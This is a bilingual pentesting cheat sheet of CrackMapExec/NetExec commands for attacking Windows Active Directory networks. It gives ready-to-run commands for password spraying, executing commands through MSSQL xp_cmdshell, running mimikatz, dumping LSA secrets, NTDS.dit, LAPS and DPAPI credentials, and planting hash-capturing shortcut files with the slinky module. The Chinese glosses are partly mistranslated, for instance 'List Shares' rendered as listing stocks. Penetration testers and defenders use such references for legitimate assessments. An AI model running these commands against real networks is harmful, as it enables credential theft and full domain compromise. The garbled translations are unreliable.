A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different services to use during PentestingCrackMapExec 和 NetExec 的备忘单,其中包含在渗透测试期间使用的不同服务的有用命令和模块
CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)CrackMapExec:https://github.com/byt3bl33d3r/CrackMapExec(不再维护)
NetExec: https://github.com/Pennyw0rth/NetExec NetExec:https://github.com/Pennyw0rth/NetExec
Installation: https://www.netexec.wiki/getting-started/installation 安装方式:https://www.netexec.wiki/getting-started/installation
The same commands for crackmapexec would also work for NetExeccrackmapexec 的相同命令也适用于 NetExec
Other names: cme, nxc其他名称: cme, nxc
Enumeration 列举
Initial Enumeration 初始枚举
1
crackmapexec smb target
Null Authentication 空身份验证
1
crackmapexec smb target -u '' -p ''
Guest Authentication 访客身份验证
1
crackmapexec smb target -u 'guest' -p ''
List Shares 列出股票
1
crackmapexec smb target -u '' -p '' --shares
1
crackmapexec smb target -u username -p password --shares
List Usernames 列出用户名
1
crackmapexec smb target -u '' -p '' --users
1
crackmapexec smb target -u '' -p '' --rid-brute
1
crackmapexec smb target -u username -p password --users
Local Authentication 本地身份验证
1
crackmapexec smb target -u username -p password --local-auth
Using Kerberos 使用 Kerberos
1
crackmapexec smb target -u username -p password -k
Check for hosts that have SMB signing disabled检查禁用了 SMB 签名的主机
1
crackmapexec smb target(s) --gen-relay-list relay.txt
Spraying 喷镀
Password Spray 密码喷雾
1
crackmapexec smb target -u users.txt -p password --continue-on-success
1
crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
1
crackmapexec ssh target(s) -u username -p password --continue-on-success
SMB
All In One 多合一
1
crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
Spider_plus Module Spider_plus模块
1
crackmapexec smb target -u username -p password -M spider_plus
1
crackmapexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
Dump a specific file 转储特定文件
1
crackmapexec smb target -u username -p password -k --get-file target_file output_file --share sharename
LDAP LDAP协议
Enumerate users using ldap使用 ldap 枚举用户
1
crackmapexec ldap target -u '' -p '' --users
All In One 多合一
1
crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
WMI
1
cme wmi target(s) -d domain -u username -p password [-H hash ] -M mimikatz
MSSQL MSSQL的
Authentication 认证
1
crackmapexec mssql target -u username -p password
Execute commands using xp_cmdshell执行 xp_cmdshell 命令
-X for powershell and -x for cmd-X 表示 powershell,-x 表示 cmd
1
crackmapexec mssql target -u username -p password -x command_to_execute
Get a file 获取文件
1
crackmapexec mssql target -u username -p password --get-file output_file target_file
Secrets Dump 机密转储
Dump LSA secrets 转储 LSA 机密
1
crackmapexec smb target -u username -p password --local-auth --lsa
gMSA
1
crackmapexec ldap target -u username -p password --gmsa-convert-id id
1
crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
Group Policy Preferences 组策略首选项
1
crackmapexec smb target -u username -p password -M gpp_password
Dump LAPS password 转储 LAPS 密码
1
crackmapexec smb target -u username -p password --laps
Dump dpapi credentials 转储 dpapi 凭据
1
crackmapexec smb target -u username -p password --laps --dpapi
Dump NTDS.dit 转储 NTDS.dit
1
crackmapexec smb target -u username -p password --ntds
Asreproast 阿斯雷普瓦斯特
1
crackmapexec ldap target -u username -p password --asreproast asrep.txt
Bloodhound 猎犬
1
crackmapexec ldap target -u username -p password --bloodhound -ns ip --collection All
Useful Modules 有用的模块
Webdav 韦达夫
Checks whether the WebClient service is running on the target检查 WebClient 服务是否在目标上运行
1
crackmapexec smb ip -u username -p password -M webdav
Veeam
Extracts credentials from local Veeam SQL Database从本地 Veeam SQL 数据库中提取凭据
1
crackmapexec smb target -u username -p password -M veeam
slinky 紧身
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions使用 icon 属性创建窗口快捷方式,该属性包含指向所有具有写入权限的共享中指定 SMB 服务器的 UNC 路径
1
crackmapexec smb ip -u username -p password -M slinky
ntdsutil
Dump NTDS with ntdsutil使用 ntdsutil 转储 NTDS
1
crackmapexec smb ip -u username -p password -M ntdsutil
ldap-checker LDAP检查器
Checks whether LDAP signing and binding are required and/or enforced检查是否需要和/或强制执行 LDAP 签名和绑定
1
cme ldap target -u username -p password -M ldap-checker
Check if the DC is vulnerable to zerologon, petitpotam, nopac检查 DC 是否容易受到 zerologon、petitpotam、nopac 的攻击
1
crackmapexec smb target -u username -p password -M zerologon
1
crackmapexec smb target -u username -p password -M petitpotam
1
crackmapexec smb target -u username -p password -M nopac
Check the MachineAccountQuota检查 MachineAccountQuota
1
crackmapexec ldap target -u username -p password -M maq
ADCS Enumeration ADCS 枚举
1
crackmapexec ldap target -u username -p password -M adcs
